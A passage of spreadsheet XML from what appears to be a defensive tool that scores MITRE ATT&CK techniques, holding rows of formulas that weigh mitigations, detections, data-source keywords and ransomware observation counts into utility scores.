        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y473">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z473">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA473">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB473">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC473" s="29" t="s">
        <v>1010</v>
      </c>
      <c r="AD473" s="25" t="str" cm="1">
        <f t="array" ref="AD473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC473)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE473" s="25">
        <f>IF(AD473="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF473" s="25" t="str" cm="1">
        <f t="array" ref="AF473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC473)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG473" s="25">
        <f>IF(AF473="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH473" s="25" t="str" cm="1">
        <f t="array" ref="AH473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC473)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI473" s="25">
        <f>IF(AH473="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ473" s="25" t="str" cm="1">
        <f t="array" ref="AJ473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC473)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK473" s="25">
        <f>IF(AJ473="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL473" s="25" t="str" cm="1">
        <f t="array" ref="AL473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC473)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM473" s="25">
        <f>IF(AL473="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN473" s="60">
        <v>1</v>
      </c>
      <c r="AO473" s="51">
        <v>1</v>
      </c>
      <c r="AP473" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4653333333333337E-2</v>
      </c>
      <c r="AQ473" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR473" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS473" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT473" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU47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74" spans="1:47" ht="48">
      <c r="A474" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6633333333333332E-2</v>
      </c>
      <c r="B474" s="25">
        <f>SUM(H474,M474,V474)*(1+SUM(AE474,AG474,AI474,AK474,AM474))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C474" s="25" t="s">
        <v>1722</v>
      </c>
      <c r="D474" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E474" s="25" t="s">
        <v>1723</v>
      </c>
      <c r="F474" s="51">
        <v>1</v>
      </c>
      <c r="G474" s="51">
        <v>1</v>
      </c>
      <c r="H474" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I474">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J474">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K474">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L474">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M474" s="25">
        <v>0</v>
      </c>
      <c r="N474" s="51">
        <v>0</v>
      </c>
      <c r="O474" s="51">
        <v>0</v>
      </c>
      <c r="P474" s="51">
        <v>0</v>
      </c>
      <c r="Q474" s="51">
        <v>0</v>
      </c>
      <c r="R474" s="51"/>
      <c r="S474" s="51">
        <v>0</v>
      </c>
      <c r="T474" s="51"/>
      <c r="U474" s="51">
        <v>0</v>
      </c>
      <c r="V474" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W474">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X474">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y474">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z474">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA474">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB474">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC474" s="29" t="s">
        <v>1724</v>
      </c>
      <c r="AD474" s="25" t="str" cm="1">
        <f t="array" ref="AD474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC474)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE474" s="25">
        <f>IF(AD474="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF474" s="25" t="str" cm="1">
        <f t="array" ref="AF474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC474)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG474" s="25">
        <f>IF(AF474="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH474" s="25" t="str" cm="1">
        <f t="array" ref="AH474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC474)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI474" s="25">
        <f>IF(AH474="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ474" s="25" t="str" cm="1">
        <f t="array" ref="AJ474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC474)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK474" s="25">
        <f>IF(AJ474="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL474" s="25" t="str" cm="1">
        <f t="array" ref="AL474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC474)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM474" s="25">
        <f>IF(AL474="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN474" s="59">
        <v>1</v>
      </c>
      <c r="AO474" s="51">
        <v>1</v>
      </c>
      <c r="AP474" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6633333333333332E-2</v>
      </c>
      <c r="AQ474" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR474" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS474" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT474" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU47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75" spans="1:47">
      <c r="A475" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4653333333333337E-2</v>
      </c>
      <c r="B475" s="25">
        <f>SUM(H475,M475,V475)*(1+SUM(AE475,AG475,AI475,AK475,AM475))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C475" s="25" t="s">
        <v>1725</v>
      </c>
      <c r="D475" s="25" t="s">
        <v>194</v>
      </c>
      <c r="E475" s="25" t="s">
        <v>1726</v>
      </c>
      <c r="F475" s="51">
        <v>1</v>
      </c>
      <c r="G475" s="51">
        <v>1</v>
      </c>
      <c r="H475" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I475">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J475">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K475">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L475">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M475" s="25">
        <v>0</v>
      </c>
      <c r="N475" s="51">
        <v>0</v>
      </c>
      <c r="O475" s="51">
        <v>0</v>
      </c>
      <c r="P475" s="51">
        <v>0</v>
      </c>
      <c r="Q475" s="51">
        <v>0</v>
      </c>
      <c r="R475" s="51"/>
      <c r="S475" s="51">
        <v>0</v>
      </c>
      <c r="T475" s="51"/>
      <c r="U475" s="51">
        <v>0</v>
      </c>
      <c r="V475" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W475">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X475">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y475">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z475">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA475">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB475">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC475" s="29" t="s">
        <v>1727</v>
      </c>
      <c r="AD475" s="25" t="str" cm="1">
        <f t="array" ref="AD475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC475)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE475" s="25">
        <f>IF(AD475="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF475" s="25" t="str" cm="1">
        <f t="array" ref="AF475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC475)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG475" s="25">
        <f>IF(AF475="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH475" s="25" t="str" cm="1">
        <f t="array" ref="AH475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC475)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI475" s="25">
        <f>IF(AH475="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ475" s="25" t="str" cm="1">
        <f t="array" ref="AJ475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC475)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK475" s="25">
        <f>IF(AJ475="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL475" s="25" t="str" cm="1">
        <f t="array" ref="AL475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC475)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM475" s="25">
        <f>IF(AL475="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN475" s="52">
        <v>1</v>
      </c>
      <c r="AO475" s="51">
        <v>1</v>
      </c>
      <c r="AP475" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4653333333333337E-2</v>
      </c>
      <c r="AQ475" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR475" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS475" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT475" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU47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76" spans="1:47" ht="32.1">
      <c r="A476" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7293333333333333E-2</v>
      </c>
      <c r="B476" s="25">
        <f>SUM(H476,M476,V476)*(1+SUM(AE476,AG476,AI476,AK476,AM476))</f>
        <v>0.1396</v>
      </c>
      <c r="C476" s="25" t="s">
        <v>1728</v>
      </c>
      <c r="D476" s="25" t="s">
        <v>187</v>
      </c>
      <c r="E476" s="25" t="s">
        <v>1729</v>
      </c>
      <c r="F476" s="51">
        <v>1</v>
      </c>
      <c r="G476" s="51">
        <v>1</v>
      </c>
      <c r="H476" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I476">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J476">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K476">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L476">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M476" s="25">
        <v>0</v>
      </c>
      <c r="N476" s="51">
        <v>0</v>
      </c>
      <c r="O476" s="51">
        <v>0</v>
      </c>
      <c r="P476" s="51">
        <v>0</v>
      </c>
      <c r="Q476" s="51">
        <v>0</v>
      </c>
      <c r="R476" s="51"/>
      <c r="S476" s="51">
        <v>0</v>
      </c>
      <c r="T476" s="51"/>
      <c r="U476" s="51">
        <v>0</v>
      </c>
      <c r="V476" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W476">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X476">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y476">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z476">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA476">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB476">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC476" s="29" t="s">
        <v>1730</v>
      </c>
      <c r="AD476" s="25" t="str" cm="1">
        <f t="array" ref="AD476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC476)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE476" s="25">
        <f>IF(AD476="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF476" s="25" t="str" cm="1">
        <f t="array" ref="AF476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC476)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG476" s="25">
        <f>IF(AF476="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH476" s="25" t="str" cm="1">
        <f t="array" ref="AH476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC476)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI476" s="25">
        <f>IF(AH476="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ476" s="25" t="str" cm="1">
        <f t="array" ref="AJ476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC476)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK476" s="25">
        <f>IF(AJ476="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL476" s="25" t="str" cm="1">
        <f t="array" ref="AL476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC476)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM476" s="25">
        <f>IF(AL476="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN476" s="52">
        <v>1</v>
      </c>
      <c r="AO476" s="51">
        <v>1</v>
      </c>
      <c r="AP476" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7293333333333333E-2</v>
      </c>
      <c r="AQ476" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.6533333333333336E-2</v>
      </c>
      <c r="AR476" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.6533333333333336E-2</v>
      </c>
      <c r="AS476" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT476" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU47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77" spans="1:47" ht="48">
      <c r="A477" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6633333333333332E-2</v>
      </c>
      <c r="B477" s="25">
        <f>SUM(H477,M477,V477)*(1+SUM(AE477,AG477,AI477,AK477,AM477))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C477" s="25" t="s">
        <v>1731</v>
      </c>
      <c r="D477" s="25" t="s">
        <v>187</v>
      </c>
      <c r="E477" s="25" t="s">
        <v>1732</v>
      </c>
      <c r="F477" s="51">
        <v>1</v>
      </c>
      <c r="G477" s="51">
        <v>1</v>
      </c>
      <c r="H477" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I477">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J477">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K477">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L477">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M477" s="25">
        <v>0</v>
      </c>
      <c r="N477" s="51">
        <v>0</v>
      </c>
      <c r="O477" s="51">
        <v>0</v>
      </c>
      <c r="P477" s="51">
        <v>0</v>
      </c>
      <c r="Q477" s="51">
        <v>0</v>
      </c>
      <c r="R477" s="51"/>
      <c r="S477" s="51">
        <v>0</v>
      </c>
      <c r="T477" s="51"/>
      <c r="U477" s="51">
        <v>0</v>
      </c>
      <c r="V477" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W477">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X477">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y477">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z477">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA477">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB477">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC477" s="29" t="s">
        <v>236</v>
      </c>
      <c r="AD477" s="25" t="str" cm="1">
        <f t="array" ref="AD477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC477)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE477" s="25">
        <f>IF(AD477="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF477" s="25" t="str" cm="1">
        <f t="array" ref="AF477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC477)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG477" s="25">
        <f>IF(AF477="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH477" s="25" t="str" cm="1">
        <f t="array" ref="AH477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC477)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI477" s="25">
        <f>IF(AH477="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ477" s="25" t="str" cm="1">
        <f t="array" ref="AJ477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC477)))))&gt;0,"1","0")</f>
        <v>0</v>
